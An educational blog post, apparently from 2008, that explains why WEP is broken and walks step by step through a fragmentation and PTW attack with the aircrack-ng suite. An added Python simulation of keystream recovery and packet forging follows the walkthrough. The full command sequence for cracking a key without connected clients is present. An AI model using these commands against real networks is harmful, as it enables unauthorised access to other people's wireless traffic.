As wireless networks keep growing, Wi-Fi security needs a constant eye of caution and periodic re-evaluation. Encrypting wireless networks is nothing new, but two main encryption methods are still deployed in today's home networks and in a large number of business networks. It has come to light in recent years that the first widely adopted wireless encryption technology, WEP (Wired Equivalent Privacy), has major flaws, and calls for it to be deprecated entirely are being heard loud and clear. It has to be said frankly that WEP can no longer be relied on to secure a network. In the past you might have argued that it offered some real deterrence against attack; you would be hard pushed to make that argument today. With the improvement in WEP-cracking techniques, breaking the encryption is a short process with a predictable outcome rather than a time-consuming, laborious task.
However, the inherent weaknesses of the WEP protocol were known long before its widespread deployment. The worrying aspect of cracking WEP today is that it can be done in literally a minute. Researchers at Darmstadt Technical University set the record for cracking WEP in 2007 by cutting the number of encrypted packets that need to be captured. Before their work you needed to capture anything between half a million and two million encrypted packets; they cut this drastically to around 40 thousand.
The main attack I'm going to focus on is the fragmentation attack. Here is a quick description, quoted from the aircrack-ng documentation (URL below):
This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.
Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bytes of PRGA are obtained or sometimes less than 1500 bytes.
The original paper, The Fragmentation Attack in Practice, by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located here. Here are presentation slides of a related paper. A local copy of the slides is located here. Also see the paper “The Final Nail in WEP's Coffin” on this page.
http://www.aircrack-ng.org/doku.php?id=fragmentation#description
The attack is very easy in practice and can be broken down into ten or so steps. I used my Eee PC running Ubuntu 8.04, but you can use BackTrack 3 or any other distro; the packages you need (the aircrack-ng suite and a wireless scanner) should be easy to find. Please only use this for educational purposes. Please don't use this to break the law.
I have just done this on my system, so your wireless devices may differ from mine.
First, run Kismet or whatever wireless scanner you're using and find the network you're going to attack. You need a few key bits of information: the network's name (ESSID), the AP's MAC address (BSSID) and the channel it is on. In my case I found:
Finux-Wireless-Network, channel 13, BSSID MAC address 00-14-7F-9D-51-11
So I would suggest declaring some variables in the shell before we start, so that we're not constantly re-typing them. Note that these only exist in the shell you type them in, so repeat them in every new terminal you open later on. In a terminal type:
export AP=(MAC address of the AP, without the brackets)
export WIFI=(MAC address of your own wireless card, ath1 in my case)
So, the first commands:
sudo airmon-ng start wifi0
airmon-ng is a bash script designed to put wireless cards into monitor mode. With the madwifi driver used here it creates a new monitor-mode interface (ath1) on top of the wifi0 device rather than changing the existing one.
sudo wlanconfig ath0 destroy
wlanconfig is the madwifi utility for creating and destroying virtual interfaces (VAPs). Destroying the managed-mode ath0 stops it from interfering with the monitor interface we are about to use.
sudo ifconfig ath1 up
sudo iwconfig ath1 mode monitor channel 13
These commands bring the new interface up and put it into monitor mode (rfmon) on channel 13 (your channel may vary). The channel must match the one the AP is on, or none of the injection below will work.
sudo aireplay-ng -1 0 -e Finux-Wireless-Network -a $AP -h $WIFI ath1
aireplay-ng is the injection tool of the suite; its best-known mode replays ARP requests to make the AP generate new IVs, but the mode used here, -1, is fake authentication. It authenticates and associates with the AP using your card's MAC address ($WIFI), which is essential when there are no clients: a WEP AP will only accept and relay injected frames from a MAC address it believes is associated. The 0 means authenticate once rather than re-associating every few seconds. You want to see "Association successful :-)" before moving on; if the AP uses MAC filtering, $WIFI will need to be an address on its allowed list.
sudo aireplay-ng -5 -b $AP -h $WIFI ath1
This runs the fragmentation attack described above. aireplay-ng waits for a data packet from the AP, asks whether to use it (answer y), then sends its fragments and collects the relayed replies. On success it writes the recovered keystream to a file in the directory you are working in named fragment-MMDD-HHMMSS.xor (the exact name is printed in its output).
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment-MMDD-HHMMSS.xor -w arp-request
packetforge-ng is a tool designed to forge ARP-request, UDP, ICMP or custom packets. Here -0 selects an ARP request, -k and -l are the destination and source IP addresses (255.255.255.255 works against most APs), -y is the keystream file from the previous step and -w the output file. You should find a file named arp-request in your working directory. It is encrypted with the IV and keystream from the .xor file, so the AP will accept it even though we never learned the key, and because it is a broadcast ARP the AP will rebroadcast it with a fresh IV each time it is replayed.
sudo airodump-ng -c 13 --bssid $AP -w capture ath1
airodump-ng is the packet capture tool of the aircrack-ng suite. It dumps frames directly from the monitor interface and saves them to a pcap or IVs-only file; -c locks it to channel 13, --bssid limits the capture to our AP and -w capture sets the file name prefix (so you end up with capture-01.cap).
You will need to leave airodump-ng running and open another terminal (re-exporting AP and WIFI there). In the new terminal:
sudo aireplay-ng -2 -r arp-request ath1
This replays the crafted arp-request we made with packetforge-ng; aireplay-ng shows you the packet and asks whether to use it (answer y). Every replay makes the AP rebroadcast the ARP with a new IV, so the #Data column in airodump-ng should start climbing quickly. Leave this running and open a new terminal.
sudo aircrack-ng -z *.cap
aircrack-ng is the 802.11 WEP / WPA-PSK key cracker. For WEP it implements the Fluhrer-Mantin-Shamir (FMS) attack along with the newer attacks by a talented hacker named KoreK, and the -z switch selects the PTW attack (Pyshkin, Tews and Weinmann, the Darmstadt work mentioned earlier), which is what brings the requirement down to tens of thousands of IVs rather than hundreds of thousands. When enough encrypted packets have been gathered, aircrack-ng can almost instantly recover the WEP key; if it fails it waits for more IVs in the capture file and retries automatically.
This command feeds every file in your working directory ending in .cap to aircrack-ng and starts cracking the WEP key. You should get output like this:
Aircrack-ng 1.0 beta1
[00:03:58] Tested 793 keys (got 47545 IVs)
KB depth byte(vote)
0 4/ 5 7E(55296) 01(54528) B5(54528) 3C(53760) B9(53760)
1 4/ 1 46(54528) 2D(54016) A8(53504) D3(53504) DD(53248)
2 1/ 7 AE(57088) 66(55552) 98(55552) A5(55552) 01(55040)
3 18/ 3 F8(53248) 36(52992) 4D(52992) 9C(52736) E7(52736)
4 0/ 1 B9(69120) 4B(56832) 5B(56576) 16(56064) D0(55040)
KEY FOUND! [ 73:4F:39:51:6D:58:69:6E:77:2C:64:6D:21 ] (ASCII: sO9QmXinw,dm! )
Decrypted correctly: 100%
And that's WEP cracked in less than five minutes with no clients attached to the network.
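To make the description of the fragmentation attack above, and the aireplay-ng -5 / packetforge-ng / aireplay-ng -2 steps, concrete, here is an added simulation written for this page; it is not code from the original post or from the aircrack-ng project. The RC4, IV and CRC-32 ICV handling is how real WEP works, but the AccessPoint class, the attacker loop, the chosen plaintext and the use of the key from the output above as the AP's key are constructed assumptions for illustration. It starts from one sniffed data frame, recovers 8 bytes of keystream from the known LLC/SNAP header, grows that to a full 1500-byte PRGA by sending fragments the AP reassembles and relays, then forges a packet the AP accepts, all without ever learning the key.

```python
# Added example for this page (not from the original post or aircrack-ng):
# a simulation of the WEP fragmentation attack against a constructed AP model.
import os
import zlib

# Every IP/ARP frame starts with an LLC/SNAP header, so these 8 bytes of
# plaintext are known (the last two, the ethertype, are 0800 IP / 0806 ARP).
LLC_SNAP = bytes.fromhex("aaaa030000000800")


def rc4(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of keystream (the PRGA output)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_keystream(iv: bytes, key: bytes, n: int) -> bytes:
    """WEP seeds RC4 with the 24-bit IV followed by the shared key."""
    return rc4(iv + key, n)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the data, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def forge(iv: bytes, prga: bytes, plaintext: bytes) -> bytes:
    """Build a valid WEP frame from recovered keystream alone (what
    packetforge-ng does with the .xor file); the key is never needed."""
    body = plaintext + icv(plaintext)
    if len(body) > len(prga):
        raise ValueError("not enough keystream for this packet")
    return iv + xor(body, prga[: len(body)])


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    return forge(iv, wep_keystream(iv, key, len(plaintext) + 4), plaintext)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, wep_keystream(iv, key, len(ct)))
    data, tag = body[:-4], body[-4:]
    if icv(data) != tag:
        raise ValueError("bad ICV")  # a real AP silently drops such a frame
    return data


class AccessPoint:
    """Constructed AP model: accepts any IV (WEP has no replay protection),
    reassembles fragments and relays the result under a fresh IV of its own."""

    def __init__(self, key: bytes):
        self.key = key

    def send_data(self, plaintext: bytes) -> bytes:
        return wep_encrypt(os.urandom(3), self.key, plaintext)

    def receive_fragments(self, frags: list) -> bytes:
        data = b"".join(wep_decrypt(self.key, f) for f in frags)
        return wep_encrypt(os.urandom(3), self.key, data)


def fragmentation_attack(ap, sniffed, target=1500, max_frags=16):
    """Grow known keystream from 8 bytes to target+4 bytes without the key.
    Returns (iv, prga, rounds): the IV the keystream belongs to and the PRGA."""
    iv, ct = sniffed[:3], sniffed[3:]
    prga = xor(ct[:8], LLC_SNAP)      # 8 bytes of keystream from the known header
    rounds = 0
    while len(prga) < target + 4:
        per_frag = len(prga) - 4      # each fragment carries data plus a 4-byte ICV
        total = min(max_frags * per_frag, target)
        plaintext = (LLC_SNAP + b"A" * total)[:total]   # chosen by us, so fully known
        frags = [forge(iv, prga, plaintext[i:i + per_frag])
                 for i in range(0, total, per_frag)]
        reply = ap.receive_fragments(frags)             # relayed as one frame, new IV
        iv, prga = reply[:3], xor(reply[3:], plaintext + icv(plaintext))
        rounds += 1
    return iv, prga, rounds


def demo(key: bytes = bytes.fromhex("734f39516d58696e772c646d21")) -> dict:
    """Run the attack; the default key is the one aircrack-ng printed above."""
    ap = AccessPoint(key)
    sniffed = ap.send_data(LLC_SNAP + b"one ordinary data frame from the AP")
    iv, prga, rounds = fragmentation_attack(ap, sniffed)
    arp_like = bytes.fromhex("aaaa030000000806") + b"\x00" * 28  # ARP-sized payload
    return {
        "rounds": rounds,
        "prga_len": len(prga),
        "genuine": prga == wep_keystream(iv, key, len(prga)),
        "accepted": wep_decrypt(key, forge(iv, prga, arp_like)) == arp_like,
    }


if __name__ == "__main__":
    print(demo())
```

Run it and it reports the number of rounds, the keystream length, whether the recovered PRGA matches the AP's real keystream for that IV, and whether the forged frame decrypted cleanly at the AP. Only three rounds are needed because 8 bytes of keystream carry 4 bytes of data per fragment, 16 fragments give a 64-byte relayed frame and so 68 bytes of keystream, the next round gives 1028, and the third reaches the 1500-byte cap. The same thing that makes this work, the AP accepting a reused IV and re-encrypting what it reassembles, is why packetforge-ng never needs the key and why WEP's missing replay protection is fatal.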
~~~~~~~~~~
URLs and Interesting Bits
~~~~~~~~~~
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
http://blip.tv/file/625845
http://www.offensive-security.com/movies/frag-final/frag-final.html
http://wireless-comm.blogspot.com/2008/05/10-easy-steps-to-crack-wireless-wep.html
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1836.0/
http://forums.remote-exploit.org/showthread.php?t=8339
http://www.informit.com/guides/content.aspx?g=security&seqNum=305&f1=rss
http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
http://ubuntuforums.org/showthread.php?t=763911
http://forums.remote-exploit.org/showthread.php?t=9457
http://oxid.netsons.org/phpBB2/viewtopic.php?t=2301&start=0&postdays=0&postorder=asc&highlight=&sid=7ee2752430f64d44fc02b0a327d7221c
http://www.youtube.com/results?search_query=wep+fragmentation+attack&search_type=
http://www.eweek.com/c/a/Mobile-and-Wireless/The-Final-Final-Nail-in-WEPs-Coffin/



Comments
Here's the HPR episode:
http://www.hackerpublicradio.org/eps/hpr0161.mp3
Arron M Finnon
President Abertay Linux Society